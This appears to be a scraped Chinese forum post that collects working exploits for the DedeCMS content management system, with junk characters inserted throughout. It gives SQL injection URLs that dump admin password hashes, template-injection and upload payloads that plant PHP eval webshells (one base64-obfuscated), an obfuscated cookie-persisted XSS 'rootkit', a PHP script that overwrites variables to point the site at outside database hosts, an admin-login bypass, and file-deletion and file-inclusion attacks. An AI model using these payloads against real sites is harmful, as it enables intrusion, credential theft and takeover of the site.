|
|
8 _! q7 p0 Y* N: QDedecms 5.6 rss注入漏洞2 T! z& H ]! B3 D# `
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1" g0 q% Y+ }7 \& d
6 v6 E8 [1 Y* a5 C7 U' M& E1 U# N0 `$ y
; `3 z3 [& J% x( `. H
: C3 l$ o$ T6 l% ^, Z* D( b" S) j4 |7 @ P
7 }" q8 |4 c a8 j' Y0 [' {) o
; H3 A7 l& |, h* w0 f9 ]
" R% J% |% ~1 z% K6 J- a$ zDedeCms v5.6 嵌入恶意代码执行漏洞
$ `; n" D( E, `" Y( |6 V+ C注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}- L E% |0 T# E i2 n
发表后查看或修改即可执行( W) n2 P0 h1 B4 {0 q9 N, W
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}' C0 N7 ~6 _: H4 \( V! w7 ?1 b( g
生成x.php 密码xiao,直接生成一句话。
8 n5 U# N, I5 _+ }) r
; Q+ }4 n$ O4 z% _: M
) a) G( |' r* g2 ~2 B
" m: l- e/ {" p4 r2 |* l/ n# S4 ]2 N7 \0 X; n& L5 N: a& G! u7 c
* `" K4 j( J, y5 Z7 o) L5 D# L1 D6 j, d2 `( {0 u% h* w
$ m8 y7 x6 g9 o+ B9 h
1 e$ r; x+ S! C) ~1 P# dDede 5.6 GBK SQL注入漏洞# f: k% {3 ?; p: |( O
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';( ~) _3 L' p8 c! a% T
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe4 [5 q6 z. Y7 S% d2 b. O+ V! ^# {
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A74 \; G% S4 S# N: r/ k
" P5 N4 F% e+ D6 G- z3 b7 ]
, h9 }* J" a2 c. t& }' Y3 E! U% M ^6 ?- C
* V' N2 ~6 R @- I! v e4 l
! Z: s" C1 y) K% \- N! g- E4 `6 N- J9 {, f w
7 g5 W2 O% ~! O. i- t E, {: ]
: n* x! m9 R$ ?$ F8 Y' Q- fDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞8 a& ?3 o) y3 S8 R
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
& a m/ H7 m5 m6 z. t# O/ j
7 y7 k% ~; X) q7 W1 y/ h, {5 j. i2 t D4 n5 |/ u- v/ g
/ J+ z; H" [, q5 j
- K1 d: X) D9 L4 b6 ~: m( M U
7 S1 ]4 h: r2 g& C/ o( P2 b$ H
T; I- _, [% qDEDECMS 全版本 gotopage变量XSS漏洞! _ \: D) f8 y2 l, ~
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 ! h$ D( n t# B7 D3 F" w# i
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="6 h; r5 V+ ]- Z N/ R
6 b) |. w8 N% {" Y( C/ a9 o- N7 Q/ [4 L) e/ [& ^
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 ' ^4 N* m+ v* V' U
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda7 t- f5 S3 p4 u0 i5 d k
0 Q6 S. D- F& m- m$ S4 x
/ ? s5 t9 G1 A- w6 E0 v1 l9 G `; V$ zhttp://v57.demo.dedecms.com/dede/login.php2 t$ e6 w5 }+ ^5 [! {8 Q0 M
3 t2 k0 Q. ~) r8 Y4 B$ i+ B7 v
; R4 W. A- l! k" Z6 x' ~# M, Scolor=Red]DeDeCMS(织梦)变量覆盖getshell1 K7 ^' |: p8 `; }# m: j1 h
#!usr/bin/php -w8 x* }5 T( N, h6 j8 \
<?php
, x" v. b* g4 g. t6 T e; L: D$ t A4 E+ oerror_reporting(E_ERROR);" E! d# |/ n- r( i
set_time_limit(0);: W2 w# M2 Q- P9 V
print_r('& h6 L4 j) s Z* L3 m! D
DEDEcms Variable Coverage @! k0 U6 O7 [
Exploit Author: www.heixiaozi.comwww.webvul.com
9 K# v+ g& U- n);) W4 k$ O$ F% Z3 o; X
echo "\r\n";
# j8 [+ U- t0 r) ]1 z# ?if($argv[2]==null){( }: x3 V% e8 ~% B( f
print_r('9 \2 P# F$ C& N0 ?: ?
+---------------------------------------------------------------------------+& s: s' P6 d6 l+ M1 }( H
Usage: php '.$argv[0].' url aid path
& Q, d& x3 K2 g; r. k2 L: Iaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
% {0 Q$ ]. d9 x% d0 T0 hExample:
5 V! ?; }; |( m8 B) s5 a5 sphp '.$argv[0].' www.site.com 1 old9 B: I, }1 R2 \% C4 e* s* U& H! Q( i
+---------------------------------------------------------------------------+
! q1 }9 m" g3 r) x9 X$ Q');6 J$ c+ y5 P4 ? X5 | r, M
exit;
/ V" l: j$ ~1 h. V) {9 P/ f}0 G/ F* I( l8 b) T4 B1 Q
$url=$argv[1];- c0 S3 C6 @1 K$ Z- W A
$aid=$argv[2];
0 ^2 i6 [" J/ @ g# {7 r6 z$path=$argv[3];
) r1 ^) b$ t, m" f( @- E$exp=Getshell($url,$aid,$path);/ W2 B. P4 \2 | u' V8 F5 r9 I
if (strpos($exp,"OK")>12){2 x* s0 M& p9 C
echo "
$ z2 a2 o. r: m8 j- \) xExploit Success \n";
2 K3 S! p, ]5 b1 J/ Z5 g$ u8 ~if($aid==1)echo "; G7 _ S$ v: X6 }) o
Shell:".$url."/$path/data/cache/fuck.php\n" ;" y- n5 ~# A: W1 J
1 ^$ m8 f8 H" w; t; O. C1 i! v/ e9 w4 A& ^4 {; n2 D6 F1 j
if($aid==2)echo "
* v8 F/ i" O; L: X+ A0 gShell:".$url."/$path/fuck.php\n" ;
( o% V0 B+ R: G' {
) \# P, r" o- n( k7 Z" P- k) j
7 ^! I; O3 J- k" `if($aid==3)echo "# H" A2 q; E: F# k% N
Shell:".$url."/$path/plus/fuck.php\n";2 z @ t) p, {3 z0 |
, f, m: r0 A# n6 h, c' k; @* k" ]3 w3 F
}else{0 N1 s ^* z6 ]; n9 F' ^* J0 l
echo "0 P3 M1 N3 |* l% x7 A# ~( h' K- k
Exploit Failed \n";) g4 S3 L2 l* x3 R
}8 j6 Y! A, n+ p! k7 ?& W! m
function Getshell($url,$aid,$path){8 f+ N* l& w. z: I! f. _1 ]6 T1 |
$id=$aid;4 W6 k' O% B |6 M, k& Q
$host=$url;
+ x. M5 L8 u) m$port="80";. O! a0 N& V% b7 t( n" T
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
) W8 Y9 s% u a7 P$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";6 C; S9 N3 A$ g w* u; N( I5 H: {4 p7 H
$data .= "Host: ".$host."\r\n";
2 W# K( W! c9 M# ]1 w$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
# M" d9 ^6 V( a- Q- B7 e$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
+ N3 F% u( A& p b. q$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
/ {8 i o. _3 I: B2 F9 `. j//$data .= "Accept-Encoding: gzip,deflate\r\n";
: K' o& I4 F X: b$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
3 b; I" Y4 ]( T Y0 |$data .= "Connection: keep-alive\r\n";* H T* O( U6 Q' i1 C9 J3 R" E/ M& c9 D
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
7 h# y; g3 `9 M( Q, ^8 ]$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
, o ^1 i2 ^: a/ H9 A3 C8 [$data .= $content."\r\n";2 `/ z+ q: c. b% z+ C; P
$ock=fsockopen($host,$port);
/ z, C: X# y1 v% r' X9 d7 aif (!$ock) {, N( W- D9 J& z/ p& I: c2 z
echo "6 x! q/ d# q" D+ d+ ], e
No response from ".$host."\n";! w) y( p3 D' t
}
9 T n2 T9 @! p2 G* Y& Z, sfwrite($ock,$data);
% n0 S/ i: k- k1 r. v7 Gwhile (!feof($ock)) {4 |7 N! ~, E8 y# E
$exp=fgets($ock, 1024);2 \. y; X! L; Q
return $exp;
% C$ _/ D* a, D0 n% r2 H}
2 K6 j- Z: V# |1 _: X}2 B, f9 h9 e5 r4 C& Z2 k
6 e* C4 e/ Z9 r, m& r- }$ a
2 ^$ @8 a4 d) _1 e' @2 X0 u?>( s, c' L: i; b! l) y
/ |0 S, @% e, i' D) Q
. f2 ^* L2 l% X9 |% F4 E3 \& u4 C- v& v9 A- {
5 u& X0 N7 `8 T, ?; U
! K7 n, n' q0 z; ~$ ?
; @' ~) r3 N) X
' p% Q) ^$ r4 N. b* W" ^! z6 x0 P* o2 {4 q. ?0 Z) {
) I7 o$ |* g! X& Z! e) u
" @" \( g; F" B9 kDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
3 Y2 _! _4 F8 f" C" Q$ R) w& thttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root y0 }; X; M1 I% f" Z
- F2 ~) q+ T; i' g p" q. w w1 D0 Y/ c! E3 A# h
把上面validate=dcug改为当前的验证码,即可直接进入网站后台* b9 u) S7 u1 u
$ c1 b" b4 h; x/ Q
7 H) Z$ z2 }+ g7 g4 [2 z
此漏洞的前提是必须得到后台路径才能实现' t: u% }9 m' ?2 M
+ ^; X& ~ A7 `1 I- g
4 _7 K2 f+ c7 P8 R: V# i1 \4 u# @5 L8 N% A5 E
* V9 W( E" ]+ L$ | L; F
1 H1 F9 r$ B* C. i
8 K" K2 l, v" `# g- l7 k* e- ?' ^1 J
5 z) k' B; o# u q! S7 K9 i- M
" J0 ?! t" z% L; V2 [
4 |6 a# F( V) g$ O+ J. R9 DDedecms织梦 标签远程文件写入漏洞
& o _4 j# @0 a! s前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
* T9 E9 o% L- A/ |
! ~+ @0 z- }# G2 `1 @9 U6 _8 X" v! ^. K8 N! F W
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
" y5 D/ J2 H& U2 \9 S7 L; [! j# x<form action="" method="post" name="QuickSearch" id="QuickSearch">
! [ @2 d$ j/ f6 Q3 H. {: \<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />. {4 u- F" E& F# U
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />' s. b; x; u4 Z3 q$ s2 [, B
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />) S% G6 f* @* o+ M
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />! T8 t' D( M2 P0 X) g8 K9 v3 M$ `2 ?
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />5 z: O- @% A7 b4 N) P
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
8 C8 R( @. p: n4 ?$ S; Q0 H<input type="text" value="true" name="nocache" style="width:400">( O3 g* K. q: t! C4 @/ h, P
<input type="submit" value="提交" name="QuickSearchBtn"><br />5 v2 x A0 Z3 J+ \
</form>$ ^& {. R4 @; ?4 L: }
<script>- D2 q: a3 b; ~
function addaction()
8 j; X7 K8 L8 V& G6 } p! S1 ?{$ c; g! T/ B0 o0 ]/ W) T
document.QuickSearch.action=document.QuickSearch.doaction.value;
. z& T8 @9 |: U6 f( P5 E}$ c Z* J6 ~+ f, d) h4 @0 p" l
</script>
* q4 h5 E- w6 @ l8 P' E( D$ D/ h& E9 m A
3 G4 U. h- k8 ^+ K9 j5 `- i
* d D5 P2 M7 T
. }$ E% n: h7 j
. \, o8 f' G- t; @
2 s0 g7 R/ j' ^ d6 r6 j+ L3 a0 H [' s2 i( I0 u, t
5 N9 H! K+ R, f& m4 `% E
* W/ O1 ?) h- ]0 |* M
. _# s% [3 g7 k6 n2 X" A9 L; R3 WDedeCms v5.6 嵌入恶意代码执行漏洞
, D/ O' H6 ?. V) M8 ~7 t: e注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
8 ~3 J+ A8 X2 P- A+ X' Za{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
5 |$ S& t/ h# ?/ R2 s生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得: U; p+ B# d) I' r. k4 q0 `, j
Dedecms <= V5.6 Final模板执行漏洞6 x# I( z# H J, m
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
2 Y1 y( @4 M7 e2 muploads/userup/2/12OMX04-15A.jpg
+ r+ g+ N( m2 b
* Z8 Q. J- ?) V6 r7 i! R! i9 y, z1 S, V/ I+ l
模板内容是(如果限制图片格式,加gif89a):4 a( w3 L. I9 W3 w8 L a2 r. Q
{dede:name runphp='yes'}/ F$ S8 _ J4 u& ?# z, S: }+ G9 s/ \
$fp = @fopen("1.php", 'a');
7 @2 `0 l. {3 j& t; {: _7 [@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");9 v* o% w' `5 S. j# \: e
@fclose($fp);
/ Y/ E; {" q$ P1 \% ^" G8 V{/dede:name}
+ F: U- w' g& o2 修改刚刚发表的文章,查看源文件,构造一个表单:
) R2 c6 O, K! a/ Y- t! E4 V. W) p<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
8 p4 B$ h- k- v7 q<input type="hidden" name="dopost" value="save" />" s$ Y6 B* J' `9 h& K8 C
<input type="hidden" name="aid" value="2" />- L% l4 b* }, o7 O4 d
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
; x5 h, V/ x* W) | }4 C& b<input type="hidden" name="channelid" value="1" />
Z9 W8 I- ?: g$ ?4 T<input type="hidden" name="oldlitpic" value="" />. P- U9 r( j% ]; n5 z+ Y; U
<input type="hidden" name="sortrank" value="1275972263" />
g4 I3 Z0 O/ a$ {6 E0 e* b6 X4 C7 V/ Z: u* o7 t6 x
1 g( a+ a7 i7 G( `# o# q<div id="mainCp">
' @8 ^) D( z! ~ x* w4 p% f& u& v<h3 class="meTitle"><strong>修改文章</strong></h3>
- a2 Y& d$ B' m- y9 b; _9 p P' }+ z( ?3 J" W
: d4 b: G" g4 c( {* j8 A M/ s4 _; I
<div class="postForm">8 R) K7 x3 F& }9 v) _
<label>标题:</label>
* h$ a6 b1 O2 |7 y, R<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
# ?5 h' L' E& T; [5 E( J) \8 d5 E# g3 }) k+ b! V# ]
! O) ~2 c$ ~7 X
<label>标签TAG:</label>( g% n# ]: ]% H8 q- _$ W2 p0 D
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
E5 b E* a, z7 Q0 Y# g9 k8 z) |! m+ {2 ~# ]4 K3 z
( r1 q# s$ Y5 f3 `! I<label>作者:</label>2 @# T& n. C: \4 o `1 w
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
+ D. n2 U! P9 i- T) M$ V* {6 @$ ?) }+ F$ h' l% P+ Q
/ r5 n( v R# p* a g) @<label>隶属栏目:</label>
( ^ x9 @% e5 L7 A% e1 q% c<select name='typeid' size='1'>0 |9 C' e7 ^8 A/ O6 ~( F9 C
<option value='1' class='option3' selected=''>测试栏目</option>4 l) a4 a( T5 X5 C/ H0 u* `' i
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
, d3 s+ z# r( y# p0 X5 B+ G8 O4 y: k# ?7 R4 D, u) K. F9 i
2 ^6 V8 _0 |: a7 A% v<label>我的分类:</label>$ q: H. T; k2 K, {' I& \
<select name='mtypesid' size='1'>1 ] p- O0 `: P1 c
<option value='0' selected>请选择分类...</option>1 ~% G" }) s7 Z- @
<option value='1' class='option3' selected>hahahha</option> {9 C8 h& y! p/ w$ X8 J/ E
</select>2 y5 [4 m% a" Y0 B4 z' q0 z, h/ D5 b9 F; A
* B2 @1 x8 z& J, X8 A# c, q
2 Y8 ]0 M" ?* o% `% I
<label>信息摘要:</label>: ]- T9 r7 k8 n4 K/ ?
<textarea name="description" id="description">1111111</textarea>6 o& ]. i% \+ f [3 A
(内容的简要说明), d# \3 e. _- X( w. Z4 d
0 y% J) \$ u' h8 ^" U
2 p, \* E) E) u, A' h& z
<label>缩略图:</label>
# ]. T& D) o( a0 _5 `<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
) ^' w/ Y! T' W; R, B6 Q1 L- F- R3 g( X, e# H, K% J* t
" m7 W0 F5 J T<input type='text' name='templet'' W3 {, f5 _6 _" ?2 \; ]
value="../ uploads/userup/2/12OMX04-15A.jpg">' u1 ]( h, ]+ Q4 h1 e3 ~# {
<input type='text' name='dede_addonfields'6 L! c$ O# q% O" p
value="templet,htmltext;">(这里构造)2 h% j: E) M! [5 r
</div>
# S1 i' D. c9 Y& F! j
. o7 d; v/ c; k8 \: M. i. V8 v6 e! k6 S1 R
<!-- 表单操作区域 -->
* S& G( K. R! t" _ b+ c<h3 class="meTitle">详细内容</h3>
( T9 U! Z6 J, o; U. ^" Y
l* ]% @/ S! m, y8 t0 w K1 f
; S y' z" x/ n; N9 W0 q/ E4 D4 \<div class="contentShow postForm">1 [4 i0 f8 G2 c" N- |+ e5 [
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
' v. l$ r$ W, }) B) V; h E
- [) ?' A- {) G1 S& i8 Z2 Z
$ w( ]! X! T8 w6 H8 y, Y" Q<label>验证码:</label>
' ~/ w) ?# T7 C9 j0 e u. p<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
) c/ K% [/ N$ J8 O+ P" x' u<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
# Y1 l* K- a5 D
3 g: \4 \5 Z) I
0 C+ z$ k7 j% a9 D5 s<button class="button2" type="submit">提交</button>
1 Z- I! L+ G7 ?* R. S4 r<button class="button2 ml10" type="reset">重置</button>7 w! x$ ?$ e5 \9 g: B& }
</div>' { E+ t1 h8 K( h
6 E+ H! L: H. |
8 r0 N8 W' W/ g' C% c0 p
</div>
" t1 F. q E, u+ [! p0 u3 E9 m: w" ]
F6 H! o9 h* w* t4 I2 J</form>% q/ H5 L4 S" k6 d
9 l- @& E) }: r# ^9 m
0 Q% S2 M( i1 A4 ?9 _$ K. P$ f
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:" Q2 Z) I \2 ^( ]5 X9 t
假设刚刚修改的文章的aid为2,则我们只需要访问:6 q* y/ S+ ], H! h2 G1 Q* g/ H
http://127.0.0.1/dede/plus/view.php?aid=2& z7 y0 j3 y% U8 L
即可以在plus目录下生成webshell:1.php
0 _* S- ]( k# w6 c( T& R9 ]2 }9 l/ F5 O( Z1 N& C' ?' _
! ^) g3 r* I0 @8 M' `4 f& @& i0 ~+ H, s3 q( [* p
: T( n" n0 \, a. [# O; ]" V) @$ G" X
( }" a# n) Z3 j( w( K% `$ i8 i" G
d; H- l$ m: t( ?$ D
7 Q2 f1 k5 c7 k5 z4 |
" o6 H' I! }$ E' p3 E, w! y' j
9 X1 E& j3 r8 ^ Q* F5 |: A! k7 {8 {4 m% f2 X6 h! ~5 r
/ c; J/ F+ F1 R1 g" d8 f( \% h* O, G
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
2 G( H n7 n- g; HGif89a{dede:field name='toby57' runphp='yes'}7 N9 T. z) n, c# Y1 z
phpinfo();3 E7 C! T2 n1 f( z; G4 E" U! ?
{/dede:field}- }& u& o1 E1 H
保存为1.gif o" ?' n0 I1 p7 ]
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
. M# [2 o, d: d4 F6 @5 O<input type="hidden" name="aid" value="7" />
! @3 [5 y, ^* i- w% x- n4 S<input type="hidden" name="mediatype" value="1" />
! U* g+ s4 C, }* w) k; h<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
$ e6 P9 T6 g6 J' F/ {<input type="hidden" name="dopost" value="save" /> $ f* Z8 G+ K) ~8 I7 J. V8 O
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 0 C; V# Q8 o8 K
<input name="addonfile" type="file" id="addonfile"/>
2 P5 f1 d" y0 Q! b<button class="button2" type="submit" >更改</button> 3 s* s9 W- u+ b6 w: U( {
</form>
. P. Q v1 s: Y ^5 q4 [1 a$ E+ c9 @5 K
2 `# @0 P4 o# k
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif& v' ^7 M6 t) {, i6 u+ d5 E, `
发表文章,然后构造修改表单如下:
% s! F4 H: |$ F& W, U" S! F0 _" z" A2 R+ I) n9 r) k& A Q: H8 g
2 s2 t$ `4 U4 H+ A1 d: z% O
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
% Z( `# j9 Z x" R# J: W+ }<input type="hidden" name="dopost" value="save" />
' W+ o) ]& U; U% \' g" t<input type="hidden" name="aid" value="2" /> 8 S+ @: ?- X! Z. \2 K* \
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
# T. [, o7 B d$ M: w<input type="hidden" name="channelid" value="1" /> + M0 W$ c' l% T+ _2 G
<input type="hidden" name="oldlitpic" value="" />
' b# L% g1 ^$ Y9 u- Z8 d4 M7 G<input type="hidden" name="sortrank" value="1282049150" />
1 ^0 c2 }9 r6 I0 L& u; L7 o0 I<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 1 [+ Z' G& H1 n, j3 A6 x8 Z
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
3 N) ?/ G8 ^! F! @! d8 }<select name='typeid' size='1'> 5 W5 I) _9 E$ p" s- g
<option value='1' class='option3' selected=''>Test</option>
; u+ f: Q ]$ {3 V: w) O, C" Q# w<select name='mtypesid' size='1'> ) ~% f8 V) s2 I) ?
<option value='0' selected>请选择分类...</option>
6 y4 K6 S: P, R" L' A8 o<option value='1' class='option3' selected>aa</option></select> 8 }; ?: V8 j0 @: K, F% _
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> * E/ B# G, L) i
<input type='hidden' name='dede_addonfields' value="templet">
6 |# r9 @" ~: ~<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
8 \$ K8 {. f1 @/ R2 c# s5 A<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> ' G$ K1 U5 ]7 K+ M3 n. |. V
<button class="button2" type="submit">提交</button>
' F( ]3 e+ |2 V6 ?& B& d: d</form>
- a3 v+ K9 J% O( m& i3 W
X; i& f! x: ?& p9 ]; v2 |2 N5 K" o5 b |' n( m
) b9 T1 ^3 r, m. Y+ c
" y: r+ }! h7 P; ? Q, N; d& g! G+ j# W9 D1 A4 r# K. |, }
. o$ l' c+ q* e7 ]; X0 l) M6 [/ C. n5 J
% L$ v1 ]! `6 r$ u$ o/ P- f
4 X3 f9 E+ v+ p
: z* d/ ^ o0 S% x7 r' ~% b' U/ O$ |3 K# r3 N2 U% u2 `' t
/ L9 D8 k0 u9 K- q织梦(Dedecms)V5.6 远程文件删除漏洞% _1 s5 ]" n9 t) T
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif" I7 O" T6 o h: x
d. V6 ?# S. `$ H
) y" G$ i) U* A. R1 L7 A, ^, ]" b
, J# s/ F: {5 L9 d
7 Y' d8 j4 ?# h3 R# t% O9 H
8 n) u2 x+ l" [" [# [( n& e* ]* p6 t
* F2 \4 @ C" y8 M( N0 A
' P$ k G4 q3 U1 e# Y, Q2 Z
! F2 w% u" q! y4 w织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
$ @1 L- ]: k6 x$ T8 K0 W# e* thttp://www.test.com/plus/carbuya ... urn&code=../../) Q9 F" e, A1 z" {+ N
3 |8 q4 L) t5 ? e& u% R7 J% q' S4 Y T1 ^* h& M0 I7 }0 A
- t, I* \- k# [! r% x0 q& x, r% G w
& }7 ^) Q9 A; `; f% s. p7 A. B5 Z3 j* Q
' q1 {' \. J+ l7 Z% h
; \( W/ l/ m; X, R. |, X
3 T" S( z/ H# T6 D/ r' V. n1 [' M3 |) _8 F4 e
" a- _$ B: d1 ?7 KDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
) m3 s, [2 }; d( w4 }- a: bplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`. D) d6 V- U9 m
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD54 ~% Q) c1 V5 D: k4 h
! c2 n; I/ ~* o M
3 m1 P9 @; E' A$ f* V+ p- y$ L6 [ B0 p$ e
, W5 K* V7 P6 ?$ ]& Z; _
; a# l l) n# X$ ?8 [- P( j
5 e! |/ y; e" C2 F3 i! ^# ~$ o. w
) ^) j1 R/ ^0 x
; Z4 H' y* y# Q$ k0 e- V7 {
& O5 ^% G, r! H
3 ~( l, N0 N8 `+ Q织梦(Dedecms) 5.1 feedback_js.php 注入漏洞1 g2 U% K* U2 B& r7 d `; g
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
+ Y% V7 M9 x" f; `( V0 D2 \+ f2 y9 @+ f: z+ i. K, X$ f) L
, Q; s" R6 i$ @0 q; h, A8 Q# s: M
- I: j' I7 y* N' I7 j9 @" Y& U2 ~3 R1 o9 I3 @
* ]1 W8 V% @8 ^& J3 z8 u2 y
7 B( _9 n8 ]- K
+ ?" ?* ]. R* j8 v3 p0 K3 U( k+ C" p
0 D% @% D4 ~9 ~# \
- ^; B) V7 }0 [2 F* |- y$ ]
